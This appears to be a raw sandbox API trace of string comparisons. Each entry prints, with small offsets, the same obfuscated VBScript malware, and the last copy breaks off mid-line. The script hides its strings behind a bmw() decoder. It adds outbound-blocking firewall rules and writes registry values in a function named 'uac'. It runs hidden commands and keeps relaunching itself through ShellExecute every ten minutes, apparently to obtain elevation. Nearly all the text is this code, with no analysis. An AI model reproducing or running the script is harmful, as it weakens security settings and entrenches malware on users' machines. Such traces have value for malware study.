ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.325] wcsncmp (_String1="OTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.325] wcsncmp (_String1="TOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.325] wcsncmp (_String1="OCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.326] wcsncmp (_String1="COL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 